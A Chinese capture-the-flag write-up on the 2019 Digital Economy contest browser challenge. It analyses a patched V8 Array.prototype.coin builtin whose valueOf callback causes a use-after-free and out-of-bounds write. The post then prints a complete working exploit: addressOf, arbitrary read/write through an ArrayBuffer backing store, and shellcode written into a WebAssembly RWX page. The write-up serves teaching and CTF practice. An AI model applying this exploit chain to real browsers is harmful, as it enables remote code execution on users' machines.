2019-数字经济大赛决赛-Browser

字数统计: 2.7k字   |   阅读时长≈ 13分

继续V8学习,继续踩着姚老板和征哥的小车车出发

环境搭建

使用如下方法进行编译

1
2
3
4
5
6
7
8
9
10
11
git reset --hard 0ec93e047216979431bd6f147ab5956bb729afa2
gclient sync

# 加入patch,编译release版本的d8
git apply --ignore-space-change --ignore-whitespace ../diff.patch
tools/dev/v8gen.py x64.release 
ninja -C out.gn/x64.release d8

# 编译debug版本的d8
tools/dev/v8gen.py x64.debug 
ninja -C out.gn/x64.debug d8

漏洞分析

题目给出了如下patch文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index e6ab965a7e..9e5eb73c34 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -362,6 +362,36 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
 }
 }  // namespace
 
+// Vulnerability is here
+// You can't use this vulnerability in Debug Build :)
+BUILTIN(ArrayCoin) {
+  uint32_t len = args.length();
+  if (len != 3) {		//判断参数个数是否为3个
+     return ReadOnlyRoots(isolate).undefined_value();
+  }
+  Handle<JSReceiver> receiver;
+  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+         isolate, receiver, Object::ToObject(isolate, args.receiver()));
+  Handle<JSArray> array = Handle<JSArray>::cast(receiver);
  //将elements保存到局部变量
+  FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+
+  Handle<Object> value;
+  Handle<Object> length;
  //将第一个参数作为length
+  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+             isolate, length, Object::ToNumber(isolate, args.at<Object>(1)));
  //将第二个参数作为value
+  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+             isolate, value, Object::ToNumber(isolate, args.at<Object>(2)));
+
+  uint32_t array_length = static_cast<uint32_t>(array->length().Number());
  //判断数组长度是否大于37
+  if(37 < array_length){
  	 //是则将第37个元素设置为value的值
+    elements.set(37, value->Number());
+    return ReadOnlyRoots(isolate).undefined_value();  
+  }
+  else{
+    return ReadOnlyRoots(isolate).undefined_value();
+  }
+}
+
 BUILTIN(ArrayPush) {
   HandleScope scope(isolate);
   Handle<Object> receiver = args.receiver();
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 3412edb89d..1837771098 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -367,6 +367,7 @@ namespace internal {
   TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel)     \
   /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */   \
   TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel)  \
+  CPP(ArrayCoin)                                   \
                                                                                \
   /* ArrayBuffer */                                                            \
   /* ES #sec-arraybuffer-constructor */                                        \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index f5fa8f19fe..03a7b601aa 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1701,6 +1701,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtins::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+    case Builtins::kArrayCoin:
+      return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtins::kArrayBufferIsView:
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index e7542dcd6b..059b54731b 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1663,6 +1663,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
                           false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",
                           Builtins::kArrayPrototypeCopyWithin, 2, false);
+	   SimpleInstallFunction(isolate_, proto, "coin",
+				Builtins::kArrayCoin, 2, false);
     SimpleInstallFunction(isolate_, proto, "fill",
                           Builtins::kArrayPrototypeFill, 1, false);
     SimpleInstallFunction(isolate_, proto, "find",

patch的主要逻辑在上面已经标注出来,总的来说:

1、 首先判断参数的个数是否为3,除去默认的第0个参数,coin函数中应该需要两个参数;

2、 然后将数组的elements保存到 局部变量中;

3、 接着获取用户输入的第一个参数作为length,第二个参数作为value

4、 最后判断数组的长度是否大于37,是则利用保存在局部变量中的elements将其第37个元素设置为value的值

这里的问题出现在Object::ToNumber()这个函数中,该函数可以通过valueOf触发callback回调,在回调函数中重新设置数组的length,就可以让数组重新分配elements的内存空间。

如果最开始让数组的长度小于37,回调函数中将其设置为一个大于37的值,这样在判断数组长度的时候是满足大于37这个条件的,但是其中的set操作是对保存在局部变量中的elements进行操作的。由于数组重新分配了elements的空间,所以保存在局部变量中的elements相当于一个已经释放了的指针,对该指针指向的elements的第37个元素进行set操作,就会导致越界写数据。

Object::ToNumber的分析

前面提到漏洞的关键在于Object::ToNumber能触发回调函数,下面从源码的角度来大致分析是在什么地方触发回调函数。

Object::ToNumber定义如下,该函数首先判断输入input是否为数字,如果是则直接返回。否则调用ConverToNumberOrNumeric函数

1
2
3
4
5
// static
MaybeHandle<Object> Object::ToNumber(Isolate* isolate, Handle<Object> input) {
  if (input->IsNumber()) return input;  // Shortcut.
  return ConvertToNumberOrNumeric(isolate, input, Conversion::kToNumber);
}

进入ConverToNumberOrNumeric,该函数是一个while循环,依次判断输入input是否为NumberStringIddballSymbol以及BigInt。如果是则调用对应的处理函数,返回相应类型值。如果不是,则在最后调用JSReceiver::ToPrimitive函数,经过JSReceiver::ToPrimitive函数处理的结果将保存到input中,经while循环再次判断input是否是NumberString等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// static
MaybeHandle<Object> Object::ConvertToNumberOrNumeric(Isolate* isolate,
                                                     Handle<Object> input,
                                                     Conversion mode) {
  while (true) {
    if (input->IsNumber()) {
      return input;
    }
    if (input->IsString()) {
      return String::ToNumber(isolate, Handle<String>::cast(input));
    }
    if (input->IsOddball()) {
      return Oddball::ToNumber(isolate, Handle<Oddball>::cast(input));
    }
    if (input->IsSymbol()) {
      THROW_NEW_ERROR(isolate, NewTypeError(MessageTemplate::kSymbolToNumber),
                      Object);
    }
    if (input->IsBigInt()) {
      if (mode == Conversion::kToNumeric) return input;
      DCHECK_EQ(mode, Conversion::kToNumber);
      THROW_NEW_ERROR(isolate, NewTypeError(MessageTemplate::kBigIntToNumber),
                      Object);
    }
    //调用该函数尝试将input转换为更原始的值,然后进入新一轮的循环对新的input进行判断
    ASSIGN_RETURN_ON_EXCEPTION(
        isolate, input, JSReceiver::ToPrimitive(Handle<JSReceiver>::cast(input),
                                                ToPrimitiveHint::kNumber),
        Object);
  }
}

继续跟进JSReceiver::ToPrimitive,在这个函数中会通过Object::GetMethod从参数receiver中获取一个函数,如果跟进Object::GetMethod也会发现它调用了JSReceiver::GetPropertyreceiver中获取属性信息,判断其是否可以调用的函数isCallable(),并将其返回。最后会用Execution::Call来调用获取到的函数,这应该就是前面提到的调用回调函数的地方。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// static
MaybeHandle<Object> JSReceiver::ToPrimitive(Handle<JSReceiver> receiver,
                                            ToPrimitiveHint hint) {
  Isolate* const isolate = receiver->GetIsolate();
  Handle<Object> exotic_to_prim;
  //获取receiver中的Method,保存到exotic_to_prim
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, exotic_to_prim,
      GetMethod(receiver, isolate->factory()->to_primitive_symbol()), Object);
  if (!exotic_to_prim->IsUndefined(isolate)) {
    Handle<Object> hint_string =
        isolate->factory()->ToPrimitiveHintString(hint);
    Handle<Object> result;
    ASSIGN_RETURN_ON_EXCEPTION(
        isolate, result,
        //调用获取到的Mthod,结果保存到result
        Execution::Call(isolate, exotic_to_prim, receiver, 1, &hint_string),
        Object);
    if (result->IsPrimitive()) return result;
    THROW_NEW_ERROR(isolate,
                    NewTypeError(MessageTemplate::kCannotConvertToPrimitive),
                    Object);
  }
  return OrdinaryToPrimitive(receiver, (hint == ToPrimitiveHint::kString)
                                           ? OrdinaryToPrimitiveHint::kString
                                           : OrdinaryToPrimitiveHint::kNumber);
}

漏洞利用

前面提到的漏洞点在于数组UAF,在ToNumber的回调中增加数组的长度来让其重新分配空间造成一个UAF,如果数组开始的长度小于37的话将会发生越界写。如果越界写的刚好是另一个数组的长度字段,那就有一个很大的数组越界了。

POC如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
var length = {
	valueOf:function(){
		return 20000000000000
	}
};   
var val= {
	// 回调函数,新申请一个数组,并重新设置数组长度为0x100
	valueOf:function(){
		victim=new Array(12).fill(1.1)
		array.length = 0x100
		return  999999999999999
	}
}
let array=[];
array.length=34;
// 会将victim的数组长度覆盖为一个很大的值
array.coin(length,val);

我想通过在debug版本中源码下断点,然后跟踪ToNumber函数回调的过程,但是会在中途报错。可能是debug版本与release版本之间某些检查的不同导致的。

所以,这里就只能使用release版本来直接看UAF后,array的长度,以及在回调函数中申请的victim的长度。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
//array:
0c:00600x3bb79f40bf28 —▸ 0x27b22fe82f79 ◂— 0x400002cbd54a001
0d:00680x3bb79f40bf30 —▸ 0x2cbd54a00c21 ◂— 0x2cbd54a007
0e:00700x3bb79f40bf38 —▸ 0x3bb79f40bf49 ◂— 0x2cbd54a007	//elements
0f:00780x3bb79f40bf40 ◂— 0x2200000000			//length=0x22
10:00800x3bb79f40bf48 —▸ 0x2cbd54a007b1 ◂— 0x2cbd54a001  //elements
11:00880x3bb79f40bf50 ◂— 0x2200000000
12:00900x3bb79f40bf58 —▸ 0x2cbd54a005b1 ◂— 0xff00002cbd54a005
13:00980x3bb79f40bf60 —▸ 0x2cbd54a005b1 ◂— 0xff00002cbd54a005

//array2:
0c:00600x3bb79f40bf28 —▸ 0x27b22fe82f79 ◂— 0x400002cbd54a001
0d:00680x3bb79f40bf30 —▸ 0x2cbd54a00c21 ◂— 0x2cbd54a007
0e:00700x3bb79f40bf38 —▸ 0x3bb79f40c1e9 ◂— 0x2cbd54a007
0f:00780x3bb79f40bf40 ◂— 0x10000000000      //length=0x10000000
10:00800x3bb79f40bf48 —▸ 0x2cbd54a007b1 ◂— 0x2cbd54a001
11:00880x3bb79f40bf50 ◂— 0x2200000000
12:00900x3bb79f40bf58 —▸ 0x2cbd54a005b1 ◂— 0xff00002cbd54a005
13:00980x3bb79f40bf60 —▸ 0x2cbd54a005b1 ◂— 0xff00002cbd54a005
//victim
00:00000x3bb79f40c068 —▸ 0x27b22fe83019 ◂— 0x400002cbd54a001
01:00080x3bb79f40c070 —▸ 0x2cbd54a00c21 ◂— 0x2cbd54a007
02:00100x3bb79f40c078 —▸ 0x3bb79f40c109 ◂— 0x2cbd54a014
03:00180x3bb79f40c080 ◂— 0x41ebddb7dde00000			//length
04:00200x3bb79f40c088 —▸ 0x2cbd54a04ed9 ◂— 0x200002cbd54a001
05:00280x3bb79f40c090 —▸ 0x1c085449fe81 ◂— 0x2cbd54a058
06:00300x3bb79f40c098 —▸ 0x2cbd54a007b1 ◂— 0x2cbd54a001
07:00380x3bb79f40c0a0 ◂— 0xc00000000

从上图中可以看到,原有的array数组的elements空间就在array对象之后。经过coin函数后,array数组会重新申请更大空间的elementssize也会变为0x10000000。而array原来的elements空间被victim对象所覆盖。然后会执行向array原有的elements[37]处写入一个大数,这里就刚好将victim对象的length覆盖为一个大数。

总结:那么我们就实现了一个数组的越界写,且这个越界写的范围很大。

addressOf

要想实现addressOf方法很简单,创建一个array对象a,修改a[0]=obj,随后使用victim去越界读obj对象的地址。

1
2
3
4
5
6
7
8
9
10
11
let a = new Array(0x12345678, 0);
let ab = new ArrayBuffer(8);

//%DebugPrint(a);
//%DebugPrint(ab);

let idx = victim.indexOf(i2f(0x1234567800000000n));
function addressOf(obj){
	a[0] = obj;
	return f2i(victim[idx]);
}

任意地址读写

首先是通过victim越界读,获取ArrayBuffer abbacksorte地址。然后通过victim越界写修改backstore为我们想要读写的地址,就能实现任意地址读写。

1
2
3
4
5
6
7
8
9
10
11
12
13
let backstore_ptr_idx = victim.indexOf(i2f(8n)) + 1;
function arb_read(addr){
	victim[backstore_ptr_idx] = i2f(addr);
	let dv = new DataView(ab);
	return f2i(dv.getFloat64(0, true));
}

function arb_write(addr, data){
	victim[backstore_ptr_idx] = i2f(addr);
	let ua = new DataView(ab);
	ua.setBigUint64(0, data, true);
	console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

getshell

提权的方法,还是使用wasmcode一把梭。不过在实现写入shellcode的时候,不能直接使用我们上面的arb_write,会出现异常。这里修改为了

1
2
3
4
5
6
var data_buf = new ArrayBuffer(32);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) -1n + 0x20n;
arb_write(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < sc.length; i++)
    data_view.setBigUint64(8*i, sc[i], true);

这里仍然是先创建ArrayBufferDataView,通过addressOf函数获取ArrayBufferback_store地址。最后使用setBigUint64写入shellcode

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
function hex(i)
{
	return i.toString(16).padStart(16, "0");
}
// 浮点数转换为64位无符号整数
function f2i(f)
{
	float64[0] = f;
	return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
	bigUint64[0] = i;
	return float64[0];
}

var length = {
	valueOf:function(){
		return 20000000000;
	}
};

var val = {
	valueOf:function(){
		victim = new Array(12).fill(1.1);
		array.length = 0x100;
		return 99999999999999;
	}
};

let array = [];
array.length = 34;
array.coin(length, val);

//%DebugPrint(victim);

let a = new Array(0x12345678, 0);
let ab = new ArrayBuffer(8);

//%DebugPrint(a);
//%DebugPrint(ab);

let idx = victim.indexOf(i2f(0x1234567800000000n));
function addressOf(obj){
	a[0] = obj;
	return f2i(victim[idx]);
}

let backstore_ptr_idx = victim.indexOf(i2f(8n)) + 1;
function arb_read(addr){
	victim[backstore_ptr_idx] = i2f(addr);
	let dv = new DataView(ab);
	return f2i(dv.getFloat64(0, true));
}

function arb_write(addr, data){
	victim[backstore_ptr_idx] = i2f(addr);
	let ua = new DataView(ab);
	ua.setBigUint64(0, data, true);
	console.log("[*] write to : 0x" +hex(addr) + ": 0x" + hex(data));
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var instance_addr = addressOf(wasmInstance) - 1n;
var rwx_page_addr = arb_read(instance_addr+0x88n);
console.log("[+]leak wasm instance addr: " + hex(instance_addr));
console.log("[+]leak rwx_page_addr: " + hex(rwx_page_addr));

//%SystemBreak();

//const sc = [72, 49, 201, 72, 129, 233, 247, 255, 255, 255, 72, 141, 5, 239, 255, 255, 255, 72, 187, 124, 199, 145, 218, 201, 186, 175, 93, 72, 49, 88, 39, 72, 45, 248, 255, 255, 255, 226, 244, 22, 252, 201, 67, 129, 1, 128, 63, 21, 169, 190, 169, 161, 186, 252, 21, 245, 32, 249, 247, 170, 186, 175, 21, 245, 33, 195, 50, 211, 186, 175, 93, 25, 191, 225, 181, 187, 206, 143, 25, 53, 148, 193, 150, 136, 227, 146, 103, 76, 233, 161, 225, 177, 217, 206, 49, 31, 199, 199, 141, 129, 51, 73, 82, 121, 199, 145, 218, 201, 186, 175, 93];

sc = [
    0x91969dd1bb48c031n,
    0x53dbf748ff978cd0n,
    0xb05e545752995f54n,
    0x50f3bn
];

var data_buf = new ArrayBuffer(32);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) -1n + 0x20n;
arb_write(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < sc.length; i++)
    data_view.setBigUint64(8*i, sc[i], true);

f();
//%SystemBreak();

参考

数字经济线下-Browser

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing